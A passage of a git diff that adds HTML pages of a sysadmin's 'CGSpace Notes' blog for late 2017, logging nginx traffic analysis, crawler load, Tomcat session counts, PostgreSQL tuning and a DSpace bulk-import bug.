+<h2 id="2017-11-20">2017-11-20</h2>
+<ul>
+<li>I found <a href="https://www.cakesolutions.net/teamblogs/low-pause-gc-on-the-jvm">an article about JVM tuning</a> that gives some pointers how to enable logging and tools to analyze logs for you</li>
+<li>Also notes on <a href="https://blog.gceasy.io/2016/11/15/rotating-gc-log-files/">rotating GC logs</a></li>
+<li>I decided to switch DSpace Test back to the CMS garbage collector because it is designed for low pauses and high throughput (like G1GC!) and because we haven&rsquo;t even tried to monitor or tune it</li>
+</ul>
+<h2 id="2017-11-21">2017-11-21</h2>
+<ul>
+<li>Magdalena was having problems logging in via LDAP and it seems to be a problem with the CGIAR LDAP server:</li>
+</ul>
+<pre tabindex="0"><code>2017-11-21 11:11:09,621 WARN  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=2FEC0E5286C17B6694567FFD77C3171C:ip_addr=77.241.141.58:ldap_authentication:type=failed_auth javax.naming.CommunicationException\colon; simple bind failed\colon; svcgroot2.cgiarad.org\colon;3269 [Root exception is javax.net.ssl.SSLHandshakeException\colon; sun.security.validator.ValidatorException\colon; PKIX path validation failed\colon; java.security.cert.CertPathValidatorException\colon; validity check failed]
+</code></pre><h2 id="2017-11-22">2017-11-22</h2>
+<ul>
+<li>Linode sent an alert that the CPU usage on the CGSpace server was very high around 4 to 6 AM</li>
+<li>The logs don&rsquo;t show anything particularly abnormal between those hours:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;22/Nov/2017:0[456]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+    136 31.6.77.23
+    174 68.180.229.254
+    217 66.249.66.91
+    256 157.55.39.79
+    268 54.144.57.183
+    281 207.46.13.137
+    282 207.46.13.36
+    290 207.46.13.23
+    696 66.249.66.90
+    707 104.196.152.243
+</code></pre><ul>
+<li>I haven&rsquo;t seen 54.144.57.183 before, it is apparently the CCBot from commoncrawl.org</li>
+<li>In other news, it looks like the JVM garbage collection pattern is back to its standard jigsaw pattern after switching back to CMS a few days ago:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/11/tomcat-jvm-cms.png" alt="Tomcat JVM with CMS GC"></p>
+<h2 id="2017-11-23">2017-11-23</h2>
+<ul>
+<li>Linode alerted again that CPU usage was high on CGSpace from 4:13 to 6:13 AM</li>
+<li>I see a lot of Googlebot (66.249.66.90) in the XMLUI access logs</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;23/Nov/2017:0[456]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+     88 66.249.66.91
+    140 68.180.229.254
+    155 54.196.2.131
+    182 54.224.164.166
+    301 157.55.39.79
+    315 207.46.13.36
+    331 207.46.13.23
+    358 207.46.13.137
+    565 104.196.152.243
+   1570 66.249.66.90
+</code></pre><ul>
+<li>&hellip; and the usual REST scrapers from CIAT (45.5.184.196) and CCAFS (70.32.83.92):</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &#34;23/Nov/2017:0[456]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+      5 190.120.6.219
+      6 104.198.9.108
+     14 104.196.152.243
+     21 112.134.150.6
+     22 157.55.39.79
+     22 207.46.13.137
+     23 207.46.13.36
+     26 207.46.13.23
+    942 45.5.184.196
+   3995 70.32.83.92
+</code></pre><ul>
+<li>These IPs crawling the REST API don&rsquo;t specify user agents and I&rsquo;d assume they are creating many Tomcat sessions</li>
+<li>I would catch them in nginx to assign a &ldquo;bot&rdquo; user agent to them so that the Tomcat Crawler Session Manager valve could deal with them, but they seem to create any really — at least not in the dspace.log:</li>
+</ul>
+<pre tabindex="0"><code>$ grep 70.32.83.92 dspace.log.2017-11-23 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+2
+</code></pre><ul>
+<li>I&rsquo;m wondering if REST works differently, or just doesn&rsquo;t log these sessions?</li>
+<li>I wonder if they are measurable via JMX MBeans?</li>
+<li>I did some tests locally and I don&rsquo;t see the sessionCounter incrementing after making requests to REST, but it does with XMLUI and OAI</li>
+<li>I came across some interesting PostgreSQL tuning advice for SSDs: <a href="https://amplitude.engineering/how-a-single-postgresql-config-change-improved-slow-query-performance-by-50x-85593b8991b0">https://amplitude.engineering/how-a-single-postgresql-config-change-improved-slow-query-performance-by-50x-85593b8991b0</a></li>
+<li>Apparently setting <code>random_page_cost</code> to 1 is &ldquo;common&rdquo; advice for systems running PostgreSQL on SSD (the default is 4)</li>
+<li>So I deployed this on DSpace Test and will check the Munin PostgreSQL graphs in a few days to see if anything changes</li>
+</ul>
+<h2 id="2017-11-24">2017-11-24</h2>
+<ul>
+<li>It&rsquo;s too early to tell for sure, but after I made the <code>random_page_cost</code> change on DSpace Test&rsquo;s PostgreSQL yesterday the number of connections dropped drastically:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/11/postgres-connections-week.png" alt="PostgreSQL connections after tweak (week)"></p>
+<ul>
+<li>There have been other temporary drops before, but if I look at the past month and actually the whole year, the trend is that connections are four or five times higher on average:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/11/postgres-connections-month.png" alt="PostgreSQL connections after tweak (month)"></p>
+<ul>
+<li>I just realized that we&rsquo;re not logging access requests to other vhosts on CGSpace, so it&rsquo;s possible I have no idea that we&rsquo;re getting slammed at 4AM on another domain that we&rsquo;re just silently redirecting to cgspace.cgiar.org</li>
+<li>I&rsquo;ve enabled logging on the CGIAR Library on CGSpace so I can check to see if there are many requests there</li>
+<li>In just a few seconds I already see a dozen requests from Googlebot (of course they get HTTP 301 redirects to cgspace.cgiar.org)</li>
+<li>I also noticed that CGNET appears to be monitoring the old domain every few minutes:</li>
+</ul>
+<pre tabindex="0"><code>192.156.137.184 - - [24/Nov/2017:20:33:58 +0000] &#34;HEAD / HTTP/1.1&#34; 301 0 &#34;-&#34; &#34;curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2&#34;
+</code></pre><ul>
+<li>I should probably tell CGIAR people to have CGNET stop that</li>
+</ul>
+<h2 id="2017-11-26">2017-11-26</h2>
+<ul>
+<li>Linode alerted that CGSpace server was using too much CPU from 5:18 to 7:18 AM</li>
+<li>Yet another mystery because the load for all domains looks fine at that time:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;26/Nov/2017:0[567]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+    190 66.249.66.83
+    195 104.196.152.243
+    220 40.77.167.82
+    246 207.46.13.137
+    247 68.180.229.254
+    257 157.55.39.214
+    289 66.249.66.91
+    298 157.55.39.206
+    379 66.249.66.70
+   1855 66.249.66.90
+</code></pre><h2 id="2017-11-29">2017-11-29</h2>
+<ul>
+<li>Linode alerted that CGSpace was using 279% CPU from 6 to 8 AM this morning</li>
+<li>About an hour later Uptime Robot said that the server was down</li>
+<li>Here are all the top XMLUI and REST users from today:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;29/Nov/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+    540 66.249.66.83
+    659 40.77.167.36
+    663 157.55.39.214
+    681 157.55.39.206
+    733 157.55.39.158
+    850 66.249.66.70
+   1311 66.249.66.90
+   1340 104.196.152.243
+   4008 70.32.83.92
+   6053 45.5.184.196
+</code></pre><ul>
+<li>PostgreSQL activity shows 69 connections</li>
+<li>I don&rsquo;t have time to troubleshoot more as I&rsquo;m in Nairobi working on the HPC so I just restarted Tomcat for now</li>
+<li>A few hours later Uptime Robot says the server is down again</li>
+<li>I don&rsquo;t see much activity in the logs but there are 87 PostgreSQL connections</li>
+<li>But shit, there were 10,000 unique Tomcat sessions today:</li>
+</ul>
+<pre tabindex="0"><code>$ cat dspace.log.2017-11-29 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+10037
+</code></pre><ul>
+<li>Although maybe that&rsquo;s not much, as the previous two days had more:</li>
+</ul>
+<pre tabindex="0"><code>$ cat dspace.log.2017-11-27 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+12377
+$ cat dspace.log.2017-11-28 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+16984
+</code></pre><ul>
+<li>I think we just need start increasing the number of allowed PostgreSQL connections instead of fighting this, as it&rsquo;s the most common source of crashes we have</li>
+<li>I will bump DSpace&rsquo;s <code>db.maxconnections</code> from 60 to 90, and PostgreSQL&rsquo;s <code>max_connections</code> from 183 to 273 (which is using my loose formula of 90 * webapps + 3)</li>
+<li>I really need to figure out how to get DSpace to use a PostgreSQL connection pool</li>
+</ul>
+<h2 id="2017-11-30">2017-11-30</h2>
+<ul>
+<li>Linode alerted about high CPU usage on CGSpace again around 6 to 8 AM</li>
+<li>Then Uptime Robot said CGSpace was down a few minutes later, but it resolved itself I think (or Tsega restarted Tomcat, I don&rsquo;t know)</li>
+</ul>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2017-12/index.html b/docs/2017-12/index.html
new file mode 100644
index 000000000..55e7f6da9
--- /dev/null
+++ b/docs/2017-12/index.html
@@ -0,0 +1,837 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="December, 2017" />
+<meta property="og:description" content="2017-12-01
+
+Uptime Robot noticed that CGSpace went down
+The logs say &ldquo;Timeout waiting for idle object&rdquo;
+PostgreSQL activity says there are 115 connections currently
+The list of connections to XMLUI and REST API for today:
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2017-12/" />
+<meta property="article:published_time" content="2017-12-01T13:53:54+03:00" />
+<meta property="article:modified_time" content="2020-04-13T15:30:24+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="December, 2017"/>
+<meta name="twitter:description" content="2017-12-01
+
+Uptime Robot noticed that CGSpace went down
+The logs say &ldquo;Timeout waiting for idle object&rdquo;
+PostgreSQL activity says there are 115 connections currently
+The list of connections to XMLUI and REST API for today:
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "December, 2017",
+  "url": "https://alanorth.github.io/cgspace-notes/2017-12/",
+  "wordCount": "4088",
+  "datePublished": "2017-12-01T13:53:54+03:00",
+  "dateModified": "2020-04-13T15:30:24+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2017-12/">
+
+    <title>December, 2017 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-12/">December, 2017</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2017-12-01T13:53:54+03:00">Fri Dec 01, 2017</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2017-12-01">2017-12-01</h2>
+<ul>
+<li>Uptime Robot noticed that CGSpace went down</li>
+<li>The logs say &ldquo;Timeout waiting for idle object&rdquo;</li>
+<li>PostgreSQL activity says there are 115 connections currently</li>
+<li>The list of connections to XMLUI and REST API for today:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;1/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+    763 2.86.122.76
+    907 207.46.13.94
+   1018 157.55.39.206
+   1021 157.55.39.235
+   1407 66.249.66.70
+   1411 104.196.152.243
+   1503 50.116.102.77
+   1805 66.249.66.90
+   4007 70.32.83.92
+   6061 45.5.184.196
+</code></pre><ul>
+<li>The number of DSpace sessions isn&rsquo;t even that high:</li>
+</ul>
+<pre tabindex="0"><code>$ cat /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+5815
+</code></pre><ul>
+<li>Connections in the last two hours:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;1/Dec/2017:(09|10)&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail                                                      
+     78 93.160.60.22
+    101 40.77.167.122
+    113 66.249.66.70
+    129 157.55.39.206
+    130 157.55.39.235
+    135 40.77.167.58
+    164 68.180.229.254
+    177 87.100.118.220
+    188 66.249.66.90
+    314 2.86.122.76
+</code></pre><ul>
+<li>What the fuck is going on?</li>
+<li>I&rsquo;ve never seen this 2.86.122.76 before, it has made quite a few unique Tomcat sessions today:</li>
+</ul>
+<pre tabindex="0"><code>$ grep 2.86.122.76 /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+822
+</code></pre><ul>
+<li>Appears to be some new bot:</li>
+</ul>
+<pre tabindex="0"><code>2.86.122.76 - - [01/Dec/2017:09:02:53 +0000] &#34;GET /handle/10568/78444?show=full HTTP/1.1&#34; 200 29307 &#34;-&#34; &#34;Mozilla/3.0 (compatible; Indy Library)&#34;
+</code></pre><ul>
+<li>I restarted Tomcat and everything came back up</li>
+<li>I can add Indy Library to the Tomcat crawler session manager valve but it would be nice if I could simply remap the useragent in nginx</li>
+<li>I will also add &lsquo;Drupal&rsquo; to the Tomcat crawler session manager valve because there are Drupals out there harvesting and they should be considered as bots</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;1/Dec/2017&#34; | grep Drupal | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+      3 54.75.205.145
+      6 70.32.83.92
+     14 2a01:7e00::f03c:91ff:fe18:7396
+     46 2001:4b99:1:1:216:3eff:fe2c:dc6c
+    319 2001:4b99:1:1:216:3eff:fe76:205b
+</code></pre><h2 id="2017-12-03">2017-12-03</h2>
+<ul>
+<li>Linode alerted that CGSpace&rsquo;s load was 327.5% from 6 to 8 AM again</li>
+</ul>
+<h2 id="2017-12-04">2017-12-04</h2>
+<ul>
+<li>Linode alerted that CGSpace&rsquo;s load was 255.5% from 8 to 10 AM again</li>
+<li>I looked at the Munin stats on DSpace Test (linode02) again to see how the PostgreSQL tweaks from a few weeks ago were holding up:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/12/postgres-connections-month.png" alt="DSpace Test PostgreSQL connections month"></p>
+<ul>
+<li>The results look fantastic! So the <code>random_page_cost</code> tweak is massively important for informing the PostgreSQL scheduler that there is no &ldquo;cost&rdquo; to accessing random pages, as we&rsquo;re on an SSD!</li>
+<li>I guess we could probably even reduce the PostgreSQL connections in DSpace / PostgreSQL after using this</li>
+<li>Run system updates on DSpace Test (linode02) and reboot it</li>
+<li>I&rsquo;m going to enable the PostgreSQL <code>random_page_cost</code> tweak on CGSpace</li>
+<li>For reference, here is the past month&rsquo;s connections:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/12/postgres-connections-month-cgspace.png" alt="CGSpace PostgreSQL connections month"></p>
+<h2 id="2017-12-05">2017-12-05</h2>
+<ul>
+<li>Linode alerted again that the CPU usage on CGSpace was high this morning from 8 to 10 AM</li>
+<li>CORE updated the entry for CGSpace on their index: <a href="https://core.ac.uk/search?q=repositories.id:(1016)&amp;fullTextOnly=false">https://core.ac.uk/search?q=repositories.id:(1016)&amp;fullTextOnly=false</a></li>
+<li>Linode alerted again that the CPU usage on CGSpace was high this evening from 8 to 10 PM</li>
+</ul>
+<h2 id="2017-12-06">2017-12-06</h2>
+<ul>
+<li>Linode alerted again that the CPU usage on CGSpace was high this morning from 6 to 8 AM</li>
+<li>Uptime Robot alerted that the server went down and up around 8:53 this morning</li>
+<li>Uptime Robot alerted that CGSpace was down and up again a few minutes later</li>
+<li>I don&rsquo;t see any errors in the DSpace logs but I see in nginx&rsquo;s access.log that UptimeRobot was returned with HTTP 499 status (Client Closed Request)</li>
+<li>Looking at the REST API logs I see some new client IP I haven&rsquo;t noticed before:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &#34;6/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+     18 95.108.181.88
+     19 68.180.229.254
+     30 207.46.13.151
+     33 207.46.13.110
+     38 40.77.167.20
+     41 157.55.39.223
+     82 104.196.152.243
+   1529 50.116.102.77
+   4005 70.32.83.92
+   6045 45.5.184.196
+</code></pre><ul>
+<li>50.116.102.77 is apparently in the US on websitewelcome.com</li>
+</ul>
+<h2 id="2017-12-07">2017-12-07</h2>
+<ul>
+<li>Uptime Robot reported a few times today that CGSpace was down and then up</li>
+<li>At one point Tsega restarted Tomcat</li>
+<li>I never got any alerts about high load from Linode though&hellip;</li>
+<li>I looked just now and see that there are 121 PostgreSQL connections!</li>
+<li>The top users right now are:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;7/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail 
+    838 40.77.167.11
+    939 66.249.66.223
+   1149 66.249.66.206
+   1316 207.46.13.110
+   1322 207.46.13.151
+   1323 2001:da8:203:2224:c912:1106:d94f:9189
+   1414 157.55.39.223
+   2378 104.196.152.243
+   2662 66.249.66.219
+   5110 124.17.34.60
+</code></pre><ul>
+<li>We&rsquo;ve never seen 124.17.34.60 yet, but it&rsquo;s really hammering us!</li>
+<li>Apparently it is from China, and here is one of its user agents:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/7.0; LCTE)
+</code></pre><ul>
+<li>It is responsible for 4,500 Tomcat sessions today alone:</li>
+</ul>
+<pre tabindex="0"><code>$ grep 124.17.34.60 /home/cgspace.cgiar.org/log/dspace.log.2017-12-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+4574
+</code></pre><ul>
+<li>I&rsquo;ve adjusted the nginx IP mapping that I set up last month to account for 124.17.34.60 and 124.17.34.59 using a regex, as it&rsquo;s the same bot on the same subnet</li>
+<li>I was running the DSpace cleanup task manually and it hit an error:</li>
+</ul>
+<pre tabindex="0"><code>$ /home/cgspace.cgiar.org/bin/dspace cleanup -v
+...
+Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
+  Detail: Key (bitstream_id)=(144666) is still referenced from table &#34;bundle&#34;.
+</code></pre><ul>
+<li>The solution is like I discovered in <a href="/cgspace-notes/2017-04">2017-04</a>, to set the <code>primary_bitstream_id</code> to null:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (144666);
+UPDATE 1
+</code></pre><h2 id="2017-12-13">2017-12-13</h2>
+<ul>
+<li>Linode alerted that CGSpace was using high CPU from 10:13 to 12:13 this morning</li>
+</ul>
+<h2 id="2017-12-16">2017-12-16</h2>
+<ul>
+<li>Re-work the XMLUI base theme to allow child themes to override the header logo&rsquo;s image and link destination: <a href="https://github.com/ilri/DSpace/pull/349">#349</a></li>
+<li>This required a little bit of work to restructure the XSL templates</li>
+<li>Optimize PNG and SVG image assets in the CGIAR base theme using pngquant and svgo: <a href="https://github.com/ilri/DSpace/pull/350">#350</a></li>
+</ul>
+<h2 id="2017-12-17">2017-12-17</h2>
+<ul>
+<li>Reboot DSpace Test to get new Linode Linux kernel</li>
+<li>Looking at CCAFS bulk import for Magdalena Haman (she originally sent them in November but some of the thumbnails were missing and dates were messed up so she resent them now)</li>
+<li>A few issues with the data and thumbnails:
+<ul>
+<li>Her thumbnail files all use capital JPG so I had to rename them to lowercase: <code>rename -fc *.JPG</code></li>
+<li>thumbnail20.jpg is 1.7MB so I have to resize it</li>
+<li>I also had to add the .jpg to the thumbnail string in the CSV</li>
+<li>The thumbnail11.jpg is missing</li>
+<li>The dates are in super long ISO8601 format (from Excel?) like <code>2016-02-07T00:00:00Z</code> so I converted them to simpler forms in GREL: <code>value.toString(&quot;yyyy-MM-dd&quot;)</code></li>
+<li>I trimmed the whitespaces in a few fields but it wasn&rsquo;t many</li>
+<li>Rename her thumbnail column to filename, and format it so SAFBuilder adds the files to the thumbnail bundle with this GREL in OpenRefine: <code>value + &quot;__bundle:THUMBNAIL&quot;</code></li>
+<li>Rename dc.identifier.status and dc.identifier.url columns to cg.identifier.status and cg.identifier.url</li>
+<li>Item 4 has weird characters in citation, ie: Nagoya et de Trait</li>
+<li>Some author names need normalization, ie: <code>Aggarwal, Pramod</code> and <code>Aggarwal, Pramod K.</code></li>
+<li>Something weird going on with duplicate authors that have the same text value, like <code>Berto, Jayson C.</code> and <code>Balmeo, Katherine P.</code></li>
+<li>I will send her feedback on some author names like UNEP and ICRISAT and ask her for the missing thumbnail11.jpg</li>
+</ul>
+</li>
+<li>I did a test import of the data locally after building with SAFBuilder but for some reason I had to specify the collection (even though the collections were specified in the <code>collection</code> field)</li>
+</ul>
+<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34; ~/dspace/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/89338 --source /Users/aorth/Downloads/2016\ bulk\ upload\ thumbnails/SimpleArchiveFormat --mapfile=/tmp/ccafs.map &amp;&gt; /tmp/ccafs.log
+</code></pre><ul>
+<li>It&rsquo;s the same on DSpace Test, I can&rsquo;t import the SAF bundle without specifying the collection:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace import --add --eperson=aorth@mjanja.ch --mapfile=/tmp/ccafs.map --source=/tmp/ccafs-2016/SimpleArchiveFormat
+No collections given. Assuming &#39;collections&#39; file inside item directory
+Adding items from directory: /tmp/ccafs-2016/SimpleArchiveFormat
+Generating mapfile: /tmp/ccafs.map
+Processing collections file: collections
+Adding item from directory item_1
+java.lang.NullPointerException
+        at org.dspace.app.itemimport.ItemImport.addItem(ItemImport.java:865)
+        at org.dspace.app.itemimport.ItemImport.addItems(ItemImport.java:736)
+        at org.dspace.app.itemimport.ItemImport.main(ItemImport.java:498)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+java.lang.NullPointerException
+Started: 1513521856014
+Ended: 1513521858573
+Elapsed time: 2 secs (2559 msecs)
+</code></pre><ul>
+<li>I even tried to debug it by adding verbose logging to the <code>JAVA_OPTS</code>:</li>
+</ul>
+<pre tabindex="0"><code>-Dlog4j.configuration=file:/Users/aorth/dspace/config/log4j-console.properties -Ddspace.log.init.disable=true
+</code></pre><ul>
+<li>&hellip; but the error message was the same, just with more INFO noise around it</li>
+<li>For now I&rsquo;ll import into a collection in DSpace Test but I&rsquo;m really not sure what&rsquo;s up with this!</li>
+<li>Linode alerted that CGSpace was using high CPU from 4 to 6 PM</li>
+<li>The logs for today show the CORE bot (137.108.70.7) being active in XMLUI:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;17/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+    671 66.249.66.70
+    885 95.108.181.88
+    904 157.55.39.96
+    923 157.55.39.179
+   1159 207.46.13.107
+   1184 104.196.152.243
+   1230 66.249.66.91
+   1414 68.180.229.254
+   4137 66.249.66.90
+  46401 137.108.70.7
+</code></pre><ul>
+<li>And then some CIAT bot (45.5.184.196) is actively hitting API endpoints:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;17/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+     33 68.180.229.254
+     48 157.55.39.96
+     51 157.55.39.179
+     56 207.46.13.107
+    102 104.196.152.243
+    102 66.249.66.90
+    691 137.108.70.7
+   1531 50.116.102.77
+   4014 70.32.83.92
+  11030 45.5.184.196
+</code></pre><ul>
+<li>That&rsquo;s probably ok, as I don&rsquo;t think the REST API connections use up a Tomcat session&hellip;</li>
+<li>CIP emailed a few days ago to ask about unique IDs for authors and organizations, and if we can provide them via an API</li>
+<li>Regarding the import issue above it seems to be a known issue that has a patch in DSpace 5.7:
+<ul>
+<li><a href="https://jira.duraspace.org/browse/DS-2633">https://jira.duraspace.org/browse/DS-2633</a></li>
+<li><a href="https://jira.duraspace.org/browse/DS-3583">https://jira.duraspace.org/browse/DS-3583</a></li>
+</ul>
+</li>
+<li>We&rsquo;re on DSpace 5.5 but there is a one-word fix to the addItem() function here: <a href="https://github.com/DSpace/DSpace/pull/1731">https://github.com/DSpace/DSpace/pull/1731</a></li>
+<li>I will apply it on our branch but I need to make a note to NOT cherry-pick it when I rebase on to the latest 5.x upstream later</li>
+<li>Pull request: <a href="https://github.com/ilri/DSpace/pull/351">#351</a></li>
+</ul>
+<h2 id="2017-12-18">2017-12-18</h2>
+<ul>
